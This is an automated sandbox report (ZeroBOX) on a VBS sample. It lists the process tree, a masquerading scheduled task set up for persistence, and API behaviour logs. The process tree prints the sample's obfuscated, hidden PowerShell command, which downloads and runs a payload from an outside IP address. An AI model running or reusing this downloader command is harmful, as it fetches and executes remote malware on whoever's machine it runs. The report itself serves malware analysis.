Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6402	Aug. 24, 2023, 9:11 a.m.	Aug. 24, 2023, 9:13 a.m.

Size	2.0KB
Type	ASCII text, with CRLF line terminators
MD5	`c9a1280f7164b74a827d14578642a559`
SHA256	`9bb3b78898cca0e561713a94cc9353b3755da2ab1de9746546c20647687dd5da`
CRC32	`91AFFEF8`
ssdeep	`24:m8eYls19/7XR/CUCC2Pmp9UkQYo9YSKOgi1tYfTo5K0S1SJFEm1sAS4xPAXZv6jH:fmVuu7ztiVrzS+Xoa2YfuvST`
Yara	Antivirus - Contains references to security software

wscript.exe "C:\Windows\System32\wscript.exe" C:\Users\test22\AppData\Local\Temp\gen.txt.vbs
3064
- cmd.exe "C:\Windows\System32\cmd.exe" /c POWeRSHeLL.eXe -NOP -WIND HIDDeN -eXeC BYPASS -NONI [BYTe[]];$A123='IeX(NeW-OBJeCT NeT.W';$B456='eBCLIeNT).DOWNLO';[BYTe[]];$C789='VAN(''http://94.156.6.224:222/coder.jpg'')'.RePLACe('VAN','ADSTRING');[BYTe[]];IeX($A123+$B456+$C789)
  2184
  - powershell.exe POWeRSHeLL.eXe -NOP -WIND HIDDeN -eXeC BYPASS -NONI [BYTe[]];$A123='IeX(NeW-OBJeCT NeT.W';$B456='eBCLIeNT).DOWNLO';[BYTe[]];$C789='VAN(''http://94.156.6.224:222/coder.jpg'')'.RePLACe('VAN','ADSTRING');[BYTe[]];IeX($A123+$B456+$C789)
    2264

Name	Response	Post-Analysis Lookup
No hosts contacted.

IP Address	Status	Action
164.124.101.2	Active	Moloch
94.156.6.224	Active	Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Queries for the computername (8 events)

Time & API	Arguments	Status	Return
GetComputerNameW Aug. 24, 2023, 9:11 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 24, 2023, 9:11 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 24, 2023, 9:11 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 24, 2023, 9:11 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA Aug. 24, 2023, 9:11 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 24, 2023, 9:11 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 24, 2023, 9:11 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 24, 2023, 9:11 a.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (1 event)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent Aug. 24, 2023, 9:11 a.m.			0	0

Command line console output was observed (50 out of 75 events)

Time & API	Arguments	Status	Return
WriteConsoleW Aug. 24, 2023, 9:11 a.m.	buffer: IsPublic IsSerial Name BaseType console_handle: 0x0000001b	1	1
WriteConsoleW Aug. 24, 2023, 9:11 a.m.	buffer: True True Byte[] System.Array console_handle: 0x00000023	1	1
WriteConsoleW Aug. 24, 2023, 9:11 a.m.	buffer: True True Byte[] System.Array console_handle: 0x00000027	1	1
WriteConsoleW Aug. 24, 2023, 9:11 a.m.	buffer: True True Byte[] System.Array console_handle: 0x0000002b	1	1
WriteConsoleW Aug. 24, 2023, 9:11 a.m.	buffer: The term 'ï»¿$Content' is not recognized as the name of a cmdlet, function, scr console_handle: 0x00000023	1	1
WriteConsoleW Aug. 24, 2023, 9:11 a.m.	buffer: ipt file, or operable program. Check the spelling of the name, or if a path was console_handle: 0x0000002f	1	1
WriteConsoleW Aug. 24, 2023, 9:11 a.m.	buffer: included, verify that the path is correct and try again. console_handle: 0x0000003b	1	1
WriteConsoleW Aug. 24, 2023, 9:11 a.m.	buffer: At line:1 char:12 console_handle: 0x00000047	1	1
WriteConsoleW Aug. 24, 2023, 9:11 a.m.	buffer: + ï»¿$Content <<<< = @' console_handle: 0x00000053	1	1
WriteConsoleW Aug. 24, 2023, 9:11 a.m.	buffer: + CategoryInfo : ObjectNotFound: (ï»¿$Content:String) [], Command console_handle: 0x0000005f	1	1
WriteConsoleW Aug. 24, 2023, 9:11 a.m.	buffer: NotFoundException console_handle: 0x0000006b	1	1
WriteConsoleW Aug. 24, 2023, 9:11 a.m.	buffer: + FullyQualifiedErrorId : CommandNotFoundException console_handle: 0x00000077	1	1
WriteConsoleW Aug. 24, 2023, 9:11 a.m.	buffer: Name : MicrosoftEdgeUpdate console_handle: 0x0000008f	1	1
WriteConsoleW Aug. 24, 2023, 9:11 a.m.	buffer: Path : \MicrosoftEdgeUpdate console_handle: 0x00000093	1	1
WriteConsoleW Aug. 24, 2023, 9:11 a.m.	buffer: State : 3 console_handle: 0x00000097	1	1
WriteConsoleW Aug. 24, 2023, 9:11 a.m.	buffer: Enabled : True console_handle: 0x0000009b	1	1
WriteConsoleW Aug. 24, 2023, 9:11 a.m.	buffer: LastRunTime : 1899-12-30 오전 12:00:00 console_handle: 0x0000009f	1	1
WriteConsoleW Aug. 24, 2023, 9:11 a.m.	buffer: LastTaskResult : 1 console_handle: 0x000000a3	1	1
WriteConsoleW Aug. 24, 2023, 9:11 a.m.	buffer: NumberOfMissedRuns : 0 console_handle: 0x000000a7	1	1
WriteConsoleW Aug. 24, 2023, 9:11 a.m.	buffer: NextRunTime : 2023-08-24 오후 12:53:31 console_handle: 0x000000ab	1	1
WriteConsoleW Aug. 24, 2023, 9:11 a.m.	buffer: Definition : System.__ComObject console_handle: 0x000000af	1	1
WriteConsoleW Aug. 24, 2023, 9:11 a.m.	buffer: Xml : <?xml version="1.0" encoding="UTF-16"?> console_handle: 0x000000b3	1	1
WriteConsoleW Aug. 24, 2023, 9:11 a.m.	buffer: <Task version="1.2" xmlns="http://schemas.microsoft.com/wi console_handle: 0x000000b7	1	1
WriteConsoleW Aug. 24, 2023, 9:11 a.m.	buffer: ndows/2004/02/mit/task"> console_handle: 0x000000bb	1	1
WriteConsoleW Aug. 24, 2023, 9:11 a.m.	buffer: <RegistrationInfo> console_handle: 0x000000bf	1	1
WriteConsoleW Aug. 24, 2023, 9:11 a.m.	buffer: <Description>Runs a script every 2 minutes</Descriptio console_handle: 0x000000c3	1	1
WriteConsoleW Aug. 24, 2023, 9:11 a.m.	buffer: n> console_handle: 0x000000c7	1	1
WriteConsoleW Aug. 24, 2023, 9:11 a.m.	buffer: </RegistrationInfo> console_handle: 0x000000cb	1	1
WriteConsoleW Aug. 24, 2023, 9:11 a.m.	buffer: <Triggers> console_handle: 0x000000cf	1	1
WriteConsoleW Aug. 24, 2023, 9:11 a.m.	buffer: <TimeTrigger> console_handle: 0x000000d3	1	1
WriteConsoleW Aug. 24, 2023, 9:11 a.m.	buffer: <Repetition> console_handle: 0x000000d7	1	1
WriteConsoleW Aug. 24, 2023, 9:11 a.m.	buffer: <Interval>PT2M</Interval> console_handle: 0x000000db	1	1
WriteConsoleW Aug. 24, 2023, 9:11 a.m.	buffer: <StopAtDurationEnd>false</StopAtDurationEnd> console_handle: 0x000000df	1	1
WriteConsoleW Aug. 24, 2023, 9:11 a.m.	buffer: </Repetition> console_handle: 0x000000e3	1	1
WriteConsoleW Aug. 24, 2023, 9:11 a.m.	buffer: <StartBoundary>2023-08-24T12:51:31</StartBoundary> console_handle: 0x000000e7	1	1
WriteConsoleW Aug. 24, 2023, 9:11 a.m.	buffer: <Enabled>true</Enabled> console_handle: 0x000000eb	1	1
WriteConsoleW Aug. 24, 2023, 9:11 a.m.	buffer: </TimeTrigger> console_handle: 0x000000ef	1	1
WriteConsoleW Aug. 24, 2023, 9:11 a.m.	buffer: </Triggers> console_handle: 0x000000f3	1	1
WriteConsoleW Aug. 24, 2023, 9:11 a.m.	buffer: <Settings> console_handle: 0x000000f7	1	1
WriteConsoleW Aug. 24, 2023, 9:11 a.m.	buffer: <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesP console_handle: 0x000000fb	1	1
WriteConsoleW Aug. 24, 2023, 9:11 a.m.	buffer: olicy> console_handle: 0x000000ff	1	1
WriteConsoleW Aug. 24, 2023, 9:11 a.m.	buffer: <DisallowStartIfOnBatteries>false</DisallowStartIfOnBa console_handle: 0x00000103	1	1
WriteConsoleW Aug. 24, 2023, 9:11 a.m.	buffer: tteries> console_handle: 0x00000107	1	1
WriteConsoleW Aug. 24, 2023, 9:11 a.m.	buffer: <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries> console_handle: 0x0000010b	1	1
WriteConsoleW Aug. 24, 2023, 9:11 a.m.	buffer: <AllowHardTerminate>true</AllowHardTerminate> console_handle: 0x0000010f	1	1
WriteConsoleW Aug. 24, 2023, 9:11 a.m.	buffer: <StartWhenAvailable>false</StartWhenAvailable> console_handle: 0x00000113	1	1
WriteConsoleW Aug. 24, 2023, 9:11 a.m.	buffer: <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvai console_handle: 0x00000117	1	1
WriteConsoleW Aug. 24, 2023, 9:11 a.m.	buffer: lable> console_handle: 0x0000011b	1	1
WriteConsoleW Aug. 24, 2023, 9:11 a.m.	buffer: <IdleSettings> console_handle: 0x0000011f	1	1
WriteConsoleW Aug. 24, 2023, 9:11 a.m.	buffer: <Duration>PT10M</Duration> console_handle: 0x00000123	1	1

Uses Windows APIs to generate a cryptographic key (46 events)

Time & API	Arguments	Status	Return
CryptExportKey Aug. 24, 2023, 9:11 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0058b4a8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 24, 2023, 9:11 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0058bc68 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 24, 2023, 9:11 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0058bc68 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 24, 2023, 9:11 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0058bc68 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 24, 2023, 9:11 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0058bb68 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 24, 2023, 9:11 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0058bb68 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 24, 2023, 9:11 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0058bb68 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 24, 2023, 9:11 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0058bb68 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 24, 2023, 9:11 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0058bb68 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 24, 2023, 9:11 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0058bb68 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 24, 2023, 9:11 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0058b568 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 24, 2023, 9:11 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0058b568 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 24, 2023, 9:11 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0058b568 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 24, 2023, 9:11 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0058b728 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 24, 2023, 9:11 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0058b728 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 24, 2023, 9:11 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0058b728 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 24, 2023, 9:11 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0058b768 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 24, 2023, 9:11 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0058b728 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 24, 2023, 9:11 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0058b728 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 24, 2023, 9:11 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0058b728 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 24, 2023, 9:11 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0058b728 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 24, 2023, 9:11 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0058b728 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 24, 2023, 9:11 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0058b728 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 24, 2023, 9:11 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0058b728 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 24, 2023, 9:11 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0058be68 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 24, 2023, 9:11 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0058be68 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 24, 2023, 9:11 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0058be68 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 24, 2023, 9:11 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0058be68 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 24, 2023, 9:11 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0058be68 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 24, 2023, 9:11 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0058be68 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 24, 2023, 9:11 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0058be68 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 24, 2023, 9:11 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0058be68 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 24, 2023, 9:11 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0058be68 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 24, 2023, 9:11 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0058be68 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 24, 2023, 9:11 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0058be68 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 24, 2023, 9:11 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0058be68 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 24, 2023, 9:11 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0058be68 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 24, 2023, 9:11 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0058be68 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 24, 2023, 9:11 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0058b128 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 24, 2023, 9:11 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0058b128 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 24, 2023, 9:11 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0058bae8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 24, 2023, 9:11 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0058bae8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 24, 2023, 9:11 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0058bae8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 24, 2023, 9:11 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0058bae8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 24, 2023, 9:11 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0058bae8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 24, 2023, 9:11 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0058bae8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx Aug. 24, 2023, 9:11 a.m.		1	1	0

One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.

Allocates read-write-execute memory (usually to unpack itself) (50 out of 158 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory Aug. 24, 2023, 9:11 a.m.	process_identifier: 2264 region_size: 1966080 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02860000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 24, 2023, 9:11 a.m.	process_identifier: 2264 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a00000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Aug. 24, 2023, 9:11 a.m.	process_identifier: 2264 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x722d1000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 24, 2023, 9:11 a.m.	process_identifier: 2264 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0263a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Aug. 24, 2023, 9:11 a.m.	process_identifier: 2264 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x722d2000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 24, 2023, 9:11 a.m.	process_identifier: 2264 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02632000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 24, 2023, 9:11 a.m.	process_identifier: 2264 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02642000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 24, 2023, 9:11 a.m.	process_identifier: 2264 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a01000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 24, 2023, 9:11 a.m.	process_identifier: 2264 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a02000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 24, 2023, 9:11 a.m.	process_identifier: 2264 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026aa000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 24, 2023, 9:11 a.m.	process_identifier: 2264 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02643000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 24, 2023, 9:11 a.m.	process_identifier: 2264 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02644000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 24, 2023, 9:11 a.m.	process_identifier: 2264 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026bb000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 24, 2023, 9:11 a.m.	process_identifier: 2264 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026b7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 24, 2023, 9:11 a.m.	process_identifier: 2264 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0263b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 24, 2023, 9:11 a.m.	process_identifier: 2264 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026a2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 24, 2023, 9:11 a.m.	process_identifier: 2264 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026b5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 24, 2023, 9:11 a.m.	process_identifier: 2264 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02645000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 24, 2023, 9:11 a.m.	process_identifier: 2264 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026ac000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 24, 2023, 9:11 a.m.	process_identifier: 2264 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x029e0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 24, 2023, 9:11 a.m.	process_identifier: 2264 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02646000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 24, 2023, 9:11 a.m.	process_identifier: 2264 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026bc000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 24, 2023, 9:11 a.m.	process_identifier: 2264 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026a3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 24, 2023, 9:11 a.m.	process_identifier: 2264 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026a4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 24, 2023, 9:11 a.m.	process_identifier: 2264 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026a5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 24, 2023, 9:11 a.m.	process_identifier: 2264 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026a6000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 24, 2023, 9:11 a.m.	process_identifier: 2264 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026a7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 24, 2023, 9:11 a.m.	process_identifier: 2264 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026a8000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 24, 2023, 9:11 a.m.	process_identifier: 2264 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026a9000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 24, 2023, 9:11 a.m.	process_identifier: 2264 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05000000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 24, 2023, 9:11 a.m.	process_identifier: 2264 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05001000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 24, 2023, 9:11 a.m.	process_identifier: 2264 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05002000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 24, 2023, 9:11 a.m.	process_identifier: 2264 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05003000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 24, 2023, 9:11 a.m.	process_identifier: 2264 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05004000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 24, 2023, 9:11 a.m.	process_identifier: 2264 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05005000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 24, 2023, 9:11 a.m.	process_identifier: 2264 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05006000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
